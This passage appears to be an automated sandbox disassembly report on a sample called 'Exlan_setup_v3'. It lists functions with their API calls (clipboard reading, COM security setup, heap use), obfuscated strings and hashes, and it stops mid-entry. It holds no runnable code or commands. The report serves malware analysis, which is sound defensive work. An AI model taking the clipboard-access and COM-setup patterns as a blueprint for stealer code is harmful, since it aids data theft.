Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 15ecba4fb383c9f6fe4caacd93e5b146e9e576434123da2826230eec0b2e149e
Instruction ID: 628e8e9ca0148a63733cdd5f87bab5d02bb3373fd89ccd5ecc51d5dfb487a543
Opcode Fuzzy Hash: 15ecba4fb383c9f6fe4caacd93e5b146e9e576434123da2826230eec0b2e149e
Instruction Fuzzy Hash: B4518E35A483148FD7249F28C841637B7A2EBD9714F19953ED9C157342E739AC21878B

Function 00435E4D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 00435E7C

Strings

UINO, xrefs: 00435EA4

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: DefaultLanguageUser
String ID: UINO
API String ID: 95929093-709208137
Opcode ID: 3c030bc17bcef4d0d7a69e9a8936a669968e16ec2a82cf1fc8d4f7c04a64b3cd
Instruction ID: 25b366ed7c2b8f42140226dd22e32c5692a29b13b52a3343db6ecc07e2707890
Opcode Fuzzy Hash: 3c030bc17bcef4d0d7a69e9a8936a669968e16ec2a82cf1fc8d4f7c04a64b3cd
Instruction Fuzzy Hash: FB11C1B0A053848FDB01DF79D8C13AE7FB2AB9B305F1880BDC6444734AC67D4A458BA6

Function 0040C916 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

CoInitializeEx.OLE32(00000000,00000002), ref: 0040C91A
CoInitializeEx.COMBASE(00000000,00000002), ref: 0040CA64

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 73111ba61a2900d05176acb8f66d69586abeaa141085828d12fb1067550cd9bf
Instruction ID: 967292ec80a1e34c1d1eb108b421d26c6e35147c1398a953a5908b94f4432901
Opcode Fuzzy Hash: 73111ba61a2900d05176acb8f66d69586abeaa141085828d12fb1067550cd9bf
Instruction Fuzzy Hash: DE41C7F4C10B40AFD370EF39990B7127EB4AB05250F504B1DF9EA866D4E631A4198BD7

Function 0043C069 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C0CD

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 9e1b484a1c96d0c42f757862e61fa707971929b46093407b27b9a70fe2a6250c
Instruction ID: cfea22a187cef83b5befe7f66d869860a4ab966d2f0dc94d42d5ee679e9ca020
Opcode Fuzzy Hash: 9e1b484a1c96d0c42f757862e61fa707971929b46093407b27b9a70fe2a6250c
Instruction Fuzzy Hash: AEF028779001448BCB08DFB8EC696BE7BB1E755309F14857EC002D3291D7389949CB48

Function 0043BE70 Relevance: 1.5, APIs: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,004383CF,?,00000001,?,004383CF,00000000,00004000), ref: 0043BEA2

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b846314bbb11985f82c1b1fc29a620635821a50167e7a317ab3f58f6b7448e06
Instruction ID: 615cad08565d8514bd86028c13064ec3a119668165e43b896a67d8a6f523662e
Opcode Fuzzy Hash: b846314bbb11985f82c1b1fc29a620635821a50167e7a317ab3f58f6b7448e06
Instruction Fuzzy Hash: 7CE02B32518210FBC2011F387C06B573A68EF8F725F020476F50092111E739E81281DF

Function 00431328 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00431372

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: edeb281f144a7338b6db2b917ec9e391609df19c97651c5c57a7541f84bb9c82
Instruction ID: 1bd5d75fe205b01903becc598ef1e02da8e2709c879177737c85d96479478b87
Opcode Fuzzy Hash: edeb281f144a7338b6db2b917ec9e391609df19c97651c5c57a7541f84bb9c82
Instruction Fuzzy Hash: A00137B56083028FE340CF24C55574BBBF2AFC4314F29881DD4954B350C7B9A9498BC2

Function 0042E2C5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 0042E30E

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 7743bee8e843c7664886dfe708e9322faa60e4ffd7aa75a42b4aba6d72bb7606
Instruction ID: 7b9898bbc3e7180a3517b09cd6fc1c51870388dc188651d0e25f3476f92ad540
Opcode Fuzzy Hash: 7743bee8e843c7664886dfe708e9322faa60e4ffd7aa75a42b4aba6d72bb7606
Instruction Fuzzy Hash: E6F0BDB45057018FD304DF24D1A8756BBE0FB85308F10481CE4958B3A0C775A548CF82

Function 0040CAA2 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040CAB4

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: cccaf909f520234461e6b42b42ac6f8de04784a1640d5a64d094872e0d280be7
Instruction ID: 7a1aaed587555689cba282a0ead52c1ae682a755f2b1b425c434da2c20e325ea
Opcode Fuzzy Hash: cccaf909f520234461e6b42b42ac6f8de04784a1640d5a64d094872e0d280be7
Instruction Fuzzy Hash: A0E01739BD4240ABF6284B18DC03F4422129382F22F788224B350EE2E9CEA8B502810C

Function 0043A5C0 Relevance: 1.5, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?,004132B9), ref: 0043A5F1

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 92f3a560ebde5fd510319da8abf2d434b406af81ffece3033112b5a151b15bbe
Instruction ID: 3701a7ddd856aee3374a72edc9fe848aa0011f8ddea3412ff80dc9a07e5bdd14
Opcode Fuzzy Hash: 92f3a560ebde5fd510319da8abf2d434b406af81ffece3033112b5a151b15bbe
Instruction Fuzzy Hash: 8DD05E3580E121EBC7102F14FC1579A3AA4FF4B322F0218B6B4045A0B1C734CC92CA9A

Function 0043C0BF Relevance: 1.5, APIs: 1, Instructions: 16COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0043C0CD

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 2c965176790cdbacd90814d7cc23f75801f8d299c4f426477a91ce1cea0d3707
Instruction ID: 5d8464f9f477f125388bfe9f7136bd82cdbbabdc580435b4efd531df0d03711f
Opcode Fuzzy Hash: 2c965176790cdbacd90814d7cc23f75801f8d299c4f426477a91ce1cea0d3707
Instruction Fuzzy Hash: 40E0ECBDD112548FCB04DF64E8455693B74A70A309700013AE146D3362D734AA5ADB08

Function 0043A5A0 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,00000000,-109BE131,0043A6F8,00000000), ref: 0043A5B0

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fd6472f75d341656d309f2239da6a6cdc06374d63603a9b90fa9c8fff7da635e
Instruction ID: f463d8f7c46da3acbc889ad6a29ee9a2367b45355c0a07f5464b7b9df379df08
Opcode Fuzzy Hash: fd6472f75d341656d309f2239da6a6cdc06374d63603a9b90fa9c8fff7da635e
Instruction Fuzzy Hash: 59C09B31449120BBCB102B15FC05FC73F54EF45751F150055F404670B5C760AC91C6D9

Non-executed Functions

Function 00426740 Relevance: 21.5, APIs: 1, Strings: 11, Instructions: 458COMMON

Download Yara Rule

Strings

XuB, xrefs: 00427552
RuB, xrefs: 00427546
`:e<, xrefs: 00427038
?%`8, xrefs: 00426FF0
}*y,, xrefs: 0042700F
ij, xrefs: 004270BC
|"b$, xrefs: 00427022
xuB, xrefs: 00427572
mlkj, xrefs: 00427590
b2l4, xrefs: 0042704E
'%`8, xrefs: 00426FAA

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: '%`8$?%`8$RuB$XuB$`:e<$b2l4$ij$mlkj$xuB$|"b$$}*y,
API String ID: 0-3894226259
Opcode ID: be5287781e342be40c34d9c510892342f9ac5158f4436302059d11578b79426d
Instruction ID: 87ba0a800d4c025ca0cd01b540a85c1db74dc73df5af2929307c3d1321491e76
Opcode Fuzzy Hash: be5287781e342be40c34d9c510892342f9ac5158f4436302059d11578b79426d
Instruction Fuzzy Hash: 89F1FFB560C7508FD728DF24D80276BB7E2FBC5304F15892DE5D58B3A1EA389905CB8A

Function 0041E970 Relevance: 17.1, Strings: 13, Instructions: 837COMMON

Download Yara Rule

Strings

kj53, xrefs: 0041ED38
^\WT, xrefs: 0041E971
c`rG, xrefs: 0041EC02
HILH, xrefs: 0041ED10
M@O@, xrefs: 0041ED53
wqgz, xrefs: 0041ECF0
IZBR, xrefs: 0041ED48
fVws, xrefs: 0041ED28
@up, xrefs: 0041ED74
r}{J, xrefs: 0041EB2D
\W, xrefs: 0041ED8A
(, xrefs: 0041EBAF
dCDX, xrefs: 0041ED18

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: ($@up$HILH$IZBR$M@O@$\W$^\WT$c`rG$dCDX$fVws$kj53$r}{J$wqgz
API String ID: 0-4093042620
Opcode ID: 1b0c2841421191a9cda9c89cc6f50705f53088bf92c92c125c31735950c87d57
Instruction ID: f65966fbb02a262f25ad03c5ffd52653fdf4558cf06c83f58d0dcbe97677d5bc
Opcode Fuzzy Hash: 1b0c2841421191a9cda9c89cc6f50705f53088bf92c92c125c31735950c87d57
Instruction Fuzzy Hash: F952697590C3808FC721CF25C8406AFBBE1AF85314F18867DE8E55B392D739894AC796

Function 00431DF0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 107clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00431E00
GetClipboardData.USER32 ref: 00431E21
CloseClipboard.USER32 ref: 00431F54

Strings

|, xrefs: 00431EDA

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataOpen
String ID: |
API String ID: 2058664381-2343686810
Opcode ID: 6dc027abc0bae3eccd2382661bdcd728bf20f47d7d023ba92b7ceb231b94d3bb
Instruction ID: 880c329042172901ea9b0d3633ddb8072ae7dcdea97f008132a1b50c67ab0bc7
Opcode Fuzzy Hash: 6dc027abc0bae3eccd2382661bdcd728bf20f47d7d023ba92b7ceb231b94d3bb
Instruction Fuzzy Hash: 7A4183B150C7828EC300EF7C858925EBFE09B96324F044A3DE8E5862E2D7789549D75B

Function 00419AF0 Relevance: 10.3, APIs: 2, Strings: 3, Instructions: 1597COMMON

Download Yara Rule

APIs

Part of subcall function 0043BED0: LdrInitializeThunk.NTDLL(0043EF3B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043BEFE

FreeLibrary.KERNEL32(?), ref: 0041A271
FreeLibrary.KERNEL32(?), ref: 0041A31B

Strings

mlkj, xrefs: 00419B12
mlkj, xrefs: 0041AB5B
mlkj, xrefs: 0041A0FD

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: FreeLibrary$InitializeThunk
String ID: mlkj$mlkj$mlkj
API String ID: 764372645-1321208144
Opcode ID: 9b1b5a2eb0413408aafbe2479586e015ab046a00d5284bde4d1c3f73aead8847
Instruction ID: eb1a4551e22f6cf0a4cc3cf23ca329ec72a0d05666075371b82b2b2d69f41d17
Opcode Fuzzy Hash: 9b1b5a2eb0413408aafbe2479586e015ab046a00d5284bde4d1c3f73aead8847
Instruction Fuzzy Hash: D7B28A72A493408BD724CF24CC817ABB7E2FBC5314F19862EE9D19B390D3789C45979A

Function 00409440 Relevance: 7.9, Strings: 6, Instructions: 390COMMON

Download Yara Rule

Strings

FE2C14A8DD36CB5E37CB803551D62973, xrefs: 004094F0
CD, xrefs: 004097A9
~$A&, xrefs: 00409769
+,, xrefs: 00409865
?, xrefs: 00409618
K, xrefs: 00409683

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: +,$?$CD$FE2C14A8DD36CB5E37CB803551D62973$K$~$A&
API String ID: 0-645812293
Opcode ID: fdee7762ad77752d1d3badf0cb31a9e6b8040cee9e65726223e06e69cd840705
Instruction ID: 41c3fe3901e52fa4e71ee56c8e5478be41a41c16f536851cae739b8875744e43
Opcode Fuzzy Hash: fdee7762ad77752d1d3badf0cb31a9e6b8040cee9e65726223e06e69cd840705
Instruction Fuzzy Hash: 1BB137B591C3908BD314DF25884166BBBE6EFD1304F148A6DF8D19B392CB39C909CB96

Function 00425C90 Relevance: 5.4, Strings: 4, Instructions: 424COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00426190
RaB, xrefs: 00426140
mlkj, xrefs: 004260A0
.rXc, xrefs: 00425E79

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: .rXc$RaB$mlkj$mlkj
API String ID: 0-546462907
Opcode ID: 58eb402b18b1bf5e647551cefa2d317290cbc608935c57a5e351c561826b91a9
Instruction ID: da63e2d954bb5f773bba6278515e7adf822363cee2a6bf373d77069efd0550b2
Opcode Fuzzy Hash: 58eb402b18b1bf5e647551cefa2d317290cbc608935c57a5e351c561826b91a9
Instruction Fuzzy Hash: D6E123B5A08340DFD724CF25E89176BB7A1FBC6304F45893CE6858B392DB789805CB5A

Function 0042B230 Relevance: 5.4, Strings: 4, Instructions: 370COMMON

Download Yara Rule

Strings

22+,, xrefs: 0042B52B
0, xrefs: 0042B4CC
0, xrefs: 0042B3D8
0, xrefs: 0042B2E7

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 0$0$0$22+,
API String ID: 0-3808782628
Opcode ID: fe86ea9910f59f80a25552c9e3fd16d658d4a793805456e03889ec510122440a
Instruction ID: 642eb8dbaf8aebf4c17fb8cb47797643189a7caa4f98c3686c20e7a8c72125aa
Opcode Fuzzy Hash: fe86ea9910f59f80a25552c9e3fd16d658d4a793805456e03889ec510122440a
Instruction Fuzzy Hash: CBB14B25A183A18BC338CB29945126AF7D2EFD6300F59896FD8D5DB381D77C88418B9A

Function 0042ACA0 Relevance: 5.2, Strings: 4, Instructions: 233COMMON

Download Yara Rule

Strings

z\R0, xrefs: 0042AD6F
{`bn, xrefs: 0042AE38
kH^-, xrefs: 0042AE59
(, xrefs: 0042AEB0

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: ($kH^-$z\R0${`bn
API String ID: 0-2599197186
Opcode ID: d30113d5570587c43a341cb1d21ec17902f15a834a40f5f6713d8802ab11ee53
Instruction ID: 65b8b11b36530245de4e57fb0962c402c98f8d9c0a46ace0756754874dda527c
Opcode Fuzzy Hash: d30113d5570587c43a341cb1d21ec17902f15a834a40f5f6713d8802ab11ee53
Instruction Fuzzy Hash: 47710AB460C3D18BD334CF2595903ABBBE1AF92300F58896DD8D95B386D3394805CBAB

Function 004383A0 Relevance: 4.2, Strings: 3, Instructions: 493COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00438891, 004385C2
mlkj, xrefs: 004383F2
mlkj, xrefs: 004385E2

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: mlkj$mlkj$mlkj
API String ID: 2994545307-1321208144
Opcode ID: 65ab1d1db09e25313719c3663478585ba53b5d470db5a41009724d01af1123bc
Instruction ID: 0c55747d60d41f724c69cca268f6d965dec2c86a26acf2b32c1d53348bef0c6d
Opcode Fuzzy Hash: 65ab1d1db09e25313719c3663478585ba53b5d470db5a41009724d01af1123bc
Instruction Fuzzy Hash: B1D158366083105BD714DF25C88162BF7E2FBC9314F19AA2DF59497391DB38EC05878A

Function 004185C3 Relevance: 4.0, Strings: 3, Instructions: 268COMMON

Download Yara Rule

Strings

mlkj, xrefs: 0041884E
7, xrefs: 004186CD
gfff, xrefs: 00418727

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 7$gfff$mlkj
API String ID: 0-2743284324
Opcode ID: dcb795d619a1eef01a3583226a75f262308535daaa193ab6280d7a5e375c1f5d
Instruction ID: a360cb6369b8c11c272dc8d8d388868b6d9a8945b5252dff4151037a1334f3f4
Opcode Fuzzy Hash: dcb795d619a1eef01a3583226a75f262308535daaa193ab6280d7a5e375c1f5d
Instruction Fuzzy Hash: 97814876A146104BD728CB29C8527AB76D2EBC5318F19C23ED889DB392DF788C4287C5

Function 0041B775 Relevance: 3.9, Strings: 3, Instructions: 111COMMON

Download Yara Rule

Strings

^\WT, xrefs: 0041B7A4
?Ljh, xrefs: 0041B796
Y, xrefs: 0041B841

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: ?Ljh$Y$^\WT
API String ID: 0-1835689315
Opcode ID: 2e97790763c4236bcf913b0224d86d8c274563cb5220c52deb1c9e008057bbdf
Instruction ID: dea75442fc43add3bb1c00c03cc88f676ec30dac494f578a30bc6c8bcb1510d0
Opcode Fuzzy Hash: 2e97790763c4236bcf913b0224d86d8c274563cb5220c52deb1c9e008057bbdf
Instruction Fuzzy Hash: DC31E2369087918BC718CF29C84036BBFE0AF96354F188A3EE4D9E7245D739C9058B86

Function 00414670 Relevance: 3.3, Strings: 2, Instructions: 823COMMON

Download Yara Rule

Strings

mlkj, xrefs: 00414AD3, 00414B2D
mlkj, xrefs: 004152B8

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: mlkj$mlkj
API String ID: 0-2064735742
Opcode ID: a04e2bd3950f275379f90aba78aaede1fc89a84416303dad15b4a71e449c0b80
Instruction ID: 4db7eeae20d33c2b6f80511dce8f40dd4e0c921fdd68d57b2c5c1dbf5c0dff96
Opcode Fuzzy Hash: a04e2bd3950f275379f90aba78aaede1fc89a84416303dad15b4a71e449c0b80
Instruction Fuzzy Hash: DF3203B6E10215DBDB14CF69DC427EFB7B2FF9A310F18406AE901A7290E7385911CB99

Function 0043ACF0 Relevance: 3.2, Strings: 2, Instructions: 653COMMON

Download Yara Rule

Strings

mlkj, xrefs: 0043AD2B
f, xrefs: 0043AF21

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: f$mlkj
API String ID: 2994545307-4173456272
Opcode ID: 7cf6d7944587067b375e7e6e6c6c1acd4d49ab82f2f2f29139dba09b87a2ef53
Instruction ID: ddfd9eda601c937df809bf92d9747a0778587b6273fc097beaf9766cd7b4f65e
Opcode Fuzzy Hash: 7cf6d7944587067b375e7e6e6c6c1acd4d49ab82f2f2f29139dba09b87a2ef53
Instruction Fuzzy Hash: A51206706083508FD714CF29C891B2FB7E2EB89314F149A2DE6D197392D779EC058B9A

Function 00416FE6 Relevance: 3.1, Strings: 2, Instructions: 580COMMON

Download Yara Rule

Strings

mlkj, xrefs: 0041711B
-Zlm, xrefs: 00416DC4

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID: -Zlm$mlkj
API String ID: 2994545307-1048775221
Opcode ID: 6c0177875069c570cd2ed028b5b578b1e665ed9123607442722e34778967a77f
Instruction ID: 6204770a65bc3cf69625204f5b314b744939e3bbb2722fdd2379973db30205ca
Opcode Fuzzy Hash: 6c0177875069c570cd2ed028b5b578b1e665ed9123607442722e34778967a77f
Instruction Fuzzy Hash: 50F15A7590C3418BD728CF28C8513ABBBE1EFD6314F19896EE8C997391D7389941CB46

Function 0040CE98 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 13COMMON

Download Yara Rule

APIs

CoUninitialize.OLE32 ref: 0040CE98

Strings

^^, xrefs: 0040E078

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID: Uninitialize
String ID: ^^
API String ID: 3861434553-1289394357
Opcode ID: 84762a6a002288a3b291fd48674ce1e4517c6cb5ad6e2e39c867a027b442b4ea
Instruction ID: 3f3ecdedac9b64a9cf8d9554acd220ebccbe30e334517fc9d9f349cca895f90a
Opcode Fuzzy Hash: 84762a6a002288a3b291fd48674ce1e4517c6cb5ad6e2e39c867a027b442b4ea
Instruction Fuzzy Hash: 9DC08CB8E480008FC38CCF20EC54576B2BAABCF642F60F43EC003A3221C530D01A860C

Function 0041D240 Relevance: 2.9, Strings: 2, Instructions: 435COMMON

Download Yara Rule

Strings

Gi, xrefs: 0041D4BA
'D, xrefs: 0041D240

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 'D$Gi
API String ID: 0-1177333443
Opcode ID: 06485e1b4be79923e235080f7042c78dcd9dcd2fde86e15fc4314469012ca261
Instruction ID: e6b73e03c1c516e5c75c684a668351991c5fdb5d75ca501a53a531a090b7545c
Opcode Fuzzy Hash: 06485e1b4be79923e235080f7042c78dcd9dcd2fde86e15fc4314469012ca261
Instruction Fuzzy Hash: F4C124B69083218BC724CF68C8916ABF3F1FF91314F09861DE9958B391E738D940C796

Function 00408FF0 Relevance: 2.9, Strings: 2, Instructions: 413COMMON

Download Yara Rule

Strings

0, xrefs: 00409352
<_, xrefs: 00409152

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 0$<_
API String ID: 0-1712127003
Opcode ID: 6635712c1edd1e0b0b26e932aa87739c20107fc429c04fabb3f97d66d24aaa7b
Instruction ID: e747819b1d146330275aebcfb809d9ede33f33ff56217b3accdb829af36e3bfb
Opcode Fuzzy Hash: 6635712c1edd1e0b0b26e932aa87739c20107fc429c04fabb3f97d66d24aaa7b
Instruction Fuzzy Hash: 6FC1077160C3918BD325CF29849075BBFE2AFD7314F0889ADE8D55B392C2398D0AC796

Function 00428859 Relevance: 2.9, Strings: 2, Instructions: 394COMMON

Download Yara Rule

Strings

U, xrefs: 004288AD
mlkj, xrefs: 00428C70

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: U$mlkj
API String ID: 0-2049939091
Opcode ID: 4a9ebb8341657dd17dce1ad6089cba3b96e69ff979d5e73bc64985b6bd9e787f
Instruction ID: b00ff1872ff7cf2a4ed5d8414f4f5aad836cea5872b331320664b8c88f6eb69f
Opcode Fuzzy Hash: 4a9ebb8341657dd17dce1ad6089cba3b96e69ff979d5e73bc64985b6bd9e787f
Instruction Fuzzy Hash: 5CC115B1A093108FD718CF28D89166FF7E1AF96304F44892EF59587392DB39D805CB5A

Function 00426760 Relevance: 2.6, Strings: 2, Instructions: 142COMMON

Download Yara Rule

Strings

2iB, xrefs: 00426926
W345, xrefs: 0042678A

Memory Dump Source

Source File: 00000001.00000002.1806989633.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Exlan_setup_v3.jbxd

Yara matches

Similarity

API ID:
String ID: 2iB$W345
API String ID: 0-1465646074
Opcode ID: ce60b9f514a791e38e86cf51ca6f65585bb31ee6f2aecd96ea8606a52a7305da
Instruction ID: e318c8fd0397a236a44cba48c18913da08c57e35e76e2460ff9f1656e87e1613
Opcode Fuzzy Hash: ce60b9f514a791e38e86cf51ca6f65585bb31ee6f2aecd96ea8606a52a7305da
Instruction Fuzzy Hash: 8741D0B66183808FD718CF64D955A6BBBE2EBC1308F44892DF1918B295DB78C449CB46

Function 004189FC Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

P<?, xrefs: 00418AA0
mlkj, xrefs: 00418A24

Memory Dump Source

